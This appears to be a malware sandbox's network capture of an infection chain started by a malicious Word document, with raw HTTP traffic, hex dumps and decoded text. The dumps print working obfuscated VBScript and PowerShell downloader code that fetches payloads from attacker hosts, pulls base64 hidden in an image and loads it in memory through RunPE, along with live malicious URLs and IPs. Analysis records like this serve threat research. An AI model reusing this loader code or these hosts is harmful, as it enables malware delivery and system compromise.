                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.2249168194.163.41.117803288C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:30.935820103 CEST139OUTHEAD /BrlcB HTTP/1.1
                Connection: Keep-Alive
                Cookie: short_1359230=1
                User-Agent: Microsoft Office Existence Discovery
                Host: ilang.in
                Jul 2, 2024 07:52:35.157634020 CEST648INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                x-powered-by: PHP/7.4.33
                set-cookie: PHPSESSID=728565fa3cf75589451f5fea5365dc3d; path=/
                expires: Thu, 19 Nov 1981 08:52:00 GMT
                cache-control: no-store, no-cache, must-revalidate
                pragma: no-cache
                location: http://23.95.235.16/88077/ima/ima.imim.im.imim.doC
                content-type: text/html; charset=UTF-8
                date: Tue, 02 Jul 2024 05:52:34 GMT
                server: LiteSpeed
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent
                Jul 2, 2024 07:52:35.362626076 CEST648INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                x-powered-by: PHP/7.4.33
                set-cookie: PHPSESSID=728565fa3cf75589451f5fea5365dc3d; path=/
                expires: Thu, 19 Nov 1981 08:52:00 GMT
                cache-control: no-store, no-cache, must-revalidate
                pragma: no-cache
                location: http://23.95.235.16/88077/ima/ima.imim.im.imim.doC
                content-type: text/html; charset=UTF-8
                date: Tue, 02 Jul 2024 05:52:34 GMT
                server: LiteSpeed
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.224916923.95.235.16803288C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:35.166367054 CEST168OUTHEAD /88077/ima/ima.imim.im.imim.doC HTTP/1.1
                Connection: Keep-Alive
                Cookie: short_1359230=1
                User-Agent: Microsoft Office Existence Discovery
                Host: 23.95.235.16
                Jul 2, 2024 07:52:35.895545959 CEST323INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 05:52:35 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                Last-Modified: Tue, 02 Jul 2024 01:09:30 GMT
                ETag: "336e9-61c395daffd01"
                Accept-Ranges: bytes
                Content-Length: 210665
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/msword
                Jul 2, 2024 07:52:35.895874977 CEST323INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 05:52:35 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                Last-Modified: Tue, 02 Jul 2024 01:09:30 GMT
                ETag: "336e9-61c395daffd01"
                Accept-Ranges: bytes
                Content-Length: 210665
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/msword


                Session IDSource IPSource PortDestination IPDestination Port
                7192.168.2.2249170194.163.41.11780
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:39.124629974 CEST150OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                Cookie: short_1359230=1
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: ilang.in
                Jul 2, 2024 07:52:40.087281942 CEST1216INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                content-type: text/html
                content-length: 795
                date: Tue, 02 Jul 2024 05:52:39 GMT
                server: LiteSpeed
                location: https://ilang.in/
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.2249172194.163.41.117803288C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:41.884862900 CEST158OUTHEAD /BrlcB HTTP/1.1
                User-Agent: Microsoft Office Existence Discovery
                Host: ilang.in
                Content-Length: 0
                Connection: Keep-Alive
                Cookie: short_1359230=1
                Jul 2, 2024 07:52:46.049160004 CEST648INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                x-powered-by: PHP/7.4.33
                set-cookie: PHPSESSID=f463d2694e8a3c4b0f4885e35da4ccc7; path=/
                expires: Thu, 19 Nov 1981 08:52:00 GMT
                cache-control: no-store, no-cache, must-revalidate
                pragma: no-cache
                location: http://23.95.235.16/88077/ima/ima.imim.im.imim.doC
                content-type: text/html; charset=UTF-8
                date: Tue, 02 Jul 2024 05:52:45 GMT
                server: LiteSpeed
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.224917323.95.235.16803288C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:46.061533928 CEST162OUTHEAD /88077/ima/ima.imim.im.imim.doC HTTP/1.1
                User-Agent: Microsoft Office Existence Discovery
                Content-Length: 0
                Connection: Keep-Alive
                Host: 23.95.235.16
                Jul 2, 2024 07:52:46.701834917 CEST323INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 05:52:46 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                Last-Modified: Tue, 02 Jul 2024 01:09:30 GMT
                ETag: "336e9-61c395daffd01"
                Accept-Ranges: bytes
                Content-Length: 210665
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/msword


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.224917423.95.235.16803504C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:47.488358021 CEST345OUTGET /88077/imagesofrosepetelflowerstogetitgreat.gif HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 23.95.235.16
                Connection: Keep-Alive
                Jul 2, 2024 07:52:47.995713949 CEST1236INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 05:52:47 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                Last-Modified: Tue, 02 Jul 2024 01:06:34 GMT
                ETag: "da4-61c39532af9ea"
                Accept-Ranges: bytes
                Content-Length: 3492
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: image/gif
                Data Raw: ff fe 44 00 69 00 6d 00 20 00 52 00 63 00 71 00 71 00 72 00 4e 00 63 00 69 00 4b 00 7a 00 65 00 57 00 4b 00 4b 00 63 00 48 00 4e 00 6e 00 78 00 75 00 5a 00 4b 00 6a 00 61 00 41 00 71 00 43 00 6c 00 65 00 6f 00 41 00 6e 00 4b 00 4b 00 6b 00 65 00 61 00 6a 00 6e 00 4e 00 54 00 6c 00 75 00 6d 00 43 00 55 00 4f 00 68 00 4c 00 52 00 4c 00 57 00 66 00 4c 00 47 00 4e 00 4c 00 50 00 4c 00 75 00 54 00 63 00 57 00 4b 00 52 00 4c 00 4c 00 65 00 4b 00 4e 00 7a 00 4f 00 69 00 62 00 6d 00 4c 00 7a 00 4c 00 47 00 4e 00 66 00 69 00 7a 00 6e 00 57 00 62 00 78 00 50 00 65 00 55 00 6c 00 47 00 6e 00 57 00 70 00 74 00 47 00 6f 00 63 00 64 00 2c 00 20 00 54 00 4c 00 4c 00 41 00 55 00 6b 00 4a 00 65 00 57 00 48 00 6b 00 66 00 55 00 57 00 64 00 4b 00 72 00 78 00 4c 00 55 00 69 00 6e 00 6d 00 7a 00 66 00 57 00 53 00 74 00 42 00 70 00 74 00 78 00 4b 00 63 00 57 00 6c 00 78 00 4c 00 51 00 57 00 67 00 70 00 4b 00 68 00 61 00 6d 00 69 00 4c 00 4f 00 55 00 52 00 42 00 4b 00 4c 00 65 00 64 00 75 00 47 00 6b 00 5a 00 78 00 4b 00 [TRUNCATED]
                Data Ascii: Dim RcqqrNciKzeWKKcHNnxuZKjaAqCleoAnKKkeajnNTlumCUOhLRLWfLGNLPLuTcWKRLLeKNzOibmLzLGNfiznWbxPeUlGnWptGocd, TLLAUkJeWHkfUWdKrxLUinmzfWStBptxKcWlxLQWgpKhamiLOURBKLeduGkZxKfPdboNBhRWLRLeZNorbKULZbcIncpUvWTzrqPBSet RcqqrNciKzeWKKcHNnxuZKjaAqCleoAnKKkeajnNTlumCUOhLRLWfLGNLPLuTcWKRLLeKNzOibmLzLGNfiznWbxPeUlGnWptGocd = CreateObject("MSXML2.ServerXMLHTTP")RcqqrNciKzeWKKcHNnxuZKjaAqCleoAnKKkeajnNTlumCUOhLRLWfLGNLPLuTcWKRLLeKNzOibmLzLGNfiznWbxPeUlGnWptGocd.Open "GE
                Jul 2, 2024 07:52:47.995737076 CEST1236INData Raw: 54 00 22 00 2c 00 20 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 34 00 31 00 2e 00 32 00 31 00 36 00 2e 00 31 00 38 00 33 00 2e 00 31 00 33 00 2f 00 55 00 73 00 65 00 72 00 73 00 5f 00 41 00 50 00 49 00 2f 00 73 00 79 00 73 00 63 00 6f 00
                Data Ascii: T", "http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txt", FalseRcqqrNciKzeWKKcHNnxuZKjaAqCleoAnKKkeajnNTlumCUO
                Jul 2, 2024 07:52:47.995748997 CEST1236INData Raw: 64 00 4c 00 63 00 50 00 43 00 57 00 66 00 4c 00 75 00 6e 00 6b 00 4c 00 75 00 78 00 55 00 55 00 75 00 0d 00 0a 00 20 00 20 00 20 00 20 00 53 00 65 00 74 00 20 00 71 00 69 00 62 00 4b 00 41 00 69 00 6b 00 62 00 6b 00 55 00 7a 00 4b 00 66 00 50 00
                Data Ascii: dLcPCWfLunkLuxUUu Set qibKAikbkUzKfPmRlhpkWZhvKLJWmZltiKtoLnLAWziceRULWaNLxNKiWiKKbiWLKUllpiZBbNNLzPLzgirdLcPCWfLunkL
                Jul 2, 2024 07:52:47.995896101 CEST94INData Raw: 4c 00 4c 00 65 00 4b 00 4e 00 7a 00 4f 00 69 00 62 00 6d 00 4c 00 7a 00 4c 00 47 00 4e 00 66 00 69 00 7a 00 6e 00 57 00 62 00 78 00 50 00 65 00 55 00 6c 00 47 00 6e 00 57 00 70 00 74 00 47 00 6f 00 63 00 64 00 20 00 3d 00 20 00 4e 00 6f 00 74 00
                Data Ascii: LLeKNzOibmLzLGNfiznWbxPeUlGnWptGocd = Nothing


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.224917541.216.183.13803616C:\Windows\SysWOW64\wscript.exe
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:48.649207115 CEST210OUTGET /Users_API/syscore/file_m0veebx3.y4i.txt HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Language: en-US
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: 41.216.183.13
                Jul 2, 2024 07:52:49.355010986 CEST1236INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 05:52:15 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                Last-Modified: Tue, 02 Jul 2024 01:06:30 GMT
                ETag: "58e-61c3952f50fdb"
                Accept-Ranges: bytes
                Content-Length: 1422
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/plain
                Data Raw: ef bb bf 28 27 50 76 4c 6c 69 6e 6b 20 3d 20 74 41 34 68 74 74 70 73 3a 2f 2f 75 70 6c 6f 61 64 64 65 69 6d 61 67 65 6e 73 27 2b 27 2e 63 6f 6d 2e 62 72 2f 69 6d 61 67 65 73 2f 30 30 34 2f 38 30 37 2f 30 35 33 2f 6f 72 69 67 69 6e 61 6c 2f 6e 65 77 5f 69 6d 61 67 65 2e 6a 70 67 3f 31 37 31 39 38 34 36 32 33 35 74 41 34 27 2b 27 3b 20 50 76 4c 77 65 62 43 6c 69 65 6e 74 20 3d 27 2b 27 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 27 2b 27 3b 20 74 72 79 20 7b 20 50 76 4c 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 3d 20 50 76 4c 77 65 62 43 6c 27 2b 27 69 65 6e 74 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 50 76 4c 6c 69 6e 6b 29 20 7d 20 63 61 74 63 68 20 7b 20 27 2b 27 57 72 69 74 65 2d 48 27 2b 27 6f 73 74 20 74 41 34 46 61 69 6c 65 64 20 54 6f 20 64 6f 77 6e 6c 6f 61 64 20 64 61 74 61 20 66 72 6f 6d 20 50 76 4c 6c 69 6e 6b 74 41 34 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 27 2b 27 6f 72 20 52 65 64 3b 20 65 78 69 74 20 7d 3b 27 2b 27 20 69 66 [TRUNCATED]
                Data Ascii: ('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[
                Jul 2, 2024 07:52:49.355171919 CEST497INData Raw: 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 50 76 4c 62 61 73 65 36 34 43 6f 6d 6d 61 6e 64 29 3b 27 2b 27 20 50 76 4c 6c 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65
                Data Ascii: System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(Pv


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.224917723.95.235.16803688C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:53.812273979 CEST76OUTGET /88077/BNNJ.txt HTTP/1.1
                Host: 23.95.235.16
                Connection: Keep-Alive
                Jul 2, 2024 07:52:54.289661884 CEST1236INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 05:52:54 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                Last-Modified: Tue, 02 Jul 2024 01:05:22 GMT
                ETag: "58800-61c394ee33af5"
                Accept-Ranges: bytes
                Content-Length: 362496
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/plain
                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                Jul 2, 2024 07:52:54.289679050 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                Jul 2, 2024 07:52:54.289690971 CEST1236INData Raw: 50 53 48 5a 51 2b 6a 43 6a 68 48 41 4f 6f 51 34 6d 73 70 72 58 42 37 45 2b 49 57 74 74 75 4d 53 70 48 4e 77 6a 59 61 36 72 45 6c 50 46 63 79 73 49 45 55 6a 56 58 71 50 61 67 79 2b 38 65 75 2b 66 4a 51 47 4d 6f 64 6a 52 46 64 4c 39 42 52 48 39 54
                Data Ascii: PSHZQ+jCjhHAOoQ4msprXB7E+IWttuMSpHNwjYa6rElPFcysIEUjVXqPagy+8eu+fJQGModjRFdL9BRH9TmBXmrceqd7QGVXdIj6HQUjYcwotZNrGBEiF3oI7AhMNID7D8AFdTak/nLF8JCL0+N3PdSm44iDMfF6aqyedsywRMNOZzRKTZoB5KzK8dY2huD8GAl2m/rko9wWuPnFheU/NFffJX7y8iBzc3L/NmyaWfmSYIiEv04
                Jul 2, 2024 07:52:54.289752007 CEST1236INData Raw: 74 66 37 6a 6a 64 49 6b 30 44 54 5a 36 35 30 6d 47 38 79 5a 39 4a 59 71 61 67 30 64 67 6d 4b 52 64 32 57 6d 74 53 75 4b 6b 4e 6f 56 30 45 37 73 46 70 51 79 6f 66 69 32 42 64 67 65 53 4d 56 42 7a 42 73 32 43 4c 75 4b 55 74 59 59 54 72 38 32 53 49
                Data Ascii: tf7jjdIk0DTZ650mG8yZ9JYqag0dgmKRd2WmtSuKkNoV0E7sFpQyofi2BdgeSMVBzBs2CLuKUtYYTr82SIduZHbzLZl6Eo73B+yWUuXwYNs/LJK3V7xK2kRmJRGH97aOBeF3zYBqxGiBN19s6otvd/VtmWE4yplz+nQDKw/nVuYbAHfoXiWzXpR9AHqOo/fQWe3JUERDenbsGmL15gZi8LdyfMIVuE+dr8h+tOrHJboev3BTZVB
                Jul 2, 2024 07:52:54.289762974 CEST1236INData Raw: 62 48 73 56 38 4e 32 34 77 42 77 6e 68 59 33 52 58 46 75 4a 51 4a 69 49 6a 78 7a 53 74 76 33 53 38 72 4d 30 63 69 6f 71 34 52 2b 39 68 7a 78 6d 79 6a 35 66 57 6b 64 49 63 52 72 35 75 62 57 30 63 31 2f 6b 73 4b 4e 71 51 62 32 67 49 47 4c 38 62 67
                Data Ascii: bHsV8N24wBwnhY3RXFuJQJiIjxzStv3S8rM0cioq4R+9hzxmyj5fWkdIcRr5ubW0c1/ksKNqQb2gIGL8bgIWtLJYPbE9ozq9QVijkdYg8cvhV5WoDzD9qru7BQfNsuJ1YqTem7AIUGqmGeQN+YEGtv+QDYV7zg5+Jvz7pTggvqUnKuKcBjBgbMQzFI/WJ7cK7Vy7eD+MnUnnI/JOLY46uckfrbdCShUVrD1oR6SaYbAtg5o/jxd
                Jul 2, 2024 07:52:54.289807081 CEST1236INData Raw: 61 66 46 62 59 61 74 35 2f 67 56 35 64 69 73 2f 4f 50 4e 72 72 68 6e 6f 36 77 67 37 70 75 55 48 63 48 52 43 35 67 53 44 4d 30 76 75 65 56 31 4d 74 48 58 71 66 6d 41 2f 6a 52 52 31 47 64 79 6d 35 56 30 74 58 78 39 30 58 67 57 38 4c 76 48 47 68 65
                Data Ascii: afFbYat5/gV5dis/OPNrrhno6wg7puUHcHRC5gSDM0vueV1MtHXqfmA/jRR1Gdym5V0tXx90XgW8LvHGhebfw6LS7AlA3SHGi8FwB6QhPNso3MhACegwBopUm7qmfjDCrQVYajNZeRxBn9Xbiq40bST7exDkRtwSlbj7GICY+IvpkcD/xIxkgQZ1X3AycWduTYDCmAPLOM0a11R6vWC8XnUmskz0kW1OwSY0MHFNGTaP5Tz6gvD
                Jul 2, 2024 07:52:54.289818048 CEST1236INData Raw: 42 45 4c 63 6a 6c 63 63 77 44 31 2f 66 4c 61 61 61 6a 79 34 68 72 75 46 4b 7a 69 4e 43 33 6f 61 4c 63 43 5a 6b 39 70 69 66 6c 74 71 59 32 31 42 7a 61 4e 6c 74 53 4b 71 41 6c 59 77 32 4a 66 48 77 45 6b 6c 5a 76 57 56 49 5a 4f 37 4e 57 4b 33 41 46
                Data Ascii: BELcjlccwD1/fLaaajy4hruFKziNC3oaLcCZk9pifltqY21BzaNltSKqAlYw2JfHwEklZvWVIZO7NWK3AFXI5oNgqBa4T4roYlb3J4TO908H2u8ChDITKeFO9hNt6G4l57nshhZKpKJ+aYkxP5hsHNOKnYZfE3hnACpsw6n+euOInLbvBVlaYGBUJVuYkVnQ3GXJx3fxLzvNTHeTPtedRojDGMzqtH9ojphoypTCRDEkHZbUp8c
                Jul 2, 2024 07:52:54.290138960 CEST1236INData Raw: 4c 72 4d 66 56 42 36 56 47 46 76 50 68 4c 36 66 63 73 69 58 69 4b 39 4f 35 43 78 2b 59 66 55 78 48 62 56 6b 62 50 38 42 61 4e 61 31 77 37 41 48 72 65 75 6b 71 6a 6d 62 5a 48 52 61 51 52 57 51 61 6e 38 62 71 39 48 43 49 76 67 77 41 54 46 33 6b 42
                Data Ascii: LrMfVB6VGFvPhL6fcsiXiK9O5Cx+YfUxHbVkbP8BaNa1w7AHreukqjmbZHRaQRWQan8bq9HCIvgwATF3kBccPQEGyrmNPiO6FPTfggxXdqLb4lvIgLwxnxhH4xXD4Tm7arfrQdL6AVlGG5T71o4Q89Q0GLxf3U7k6z37+K6AnzTqZw24LF0MRN+IZHuQ0H4g5zCcKCYesnKVXlZzhSSCJa2huZmKkvnOLNfY687iF6Ihs3wugNH
                Jul 2, 2024 07:52:54.290172100 CEST1236INData Raw: 66 61 2b 6d 36 6f 77 66 68 4c 63 37 44 70 32 35 50 32 77 54 6e 41 75 6e 61 36 41 6a 54 46 65 2f 72 32 4b 54 71 68 50 4b 4b 50 32 73 61 56 4c 70 45 6a 72 59 4e 43 72 54 4e 2f 55 2b 39 69 30 36 55 76 55 49 49 45 62 78 50 34 43 79 33 64 6e 32 70 65
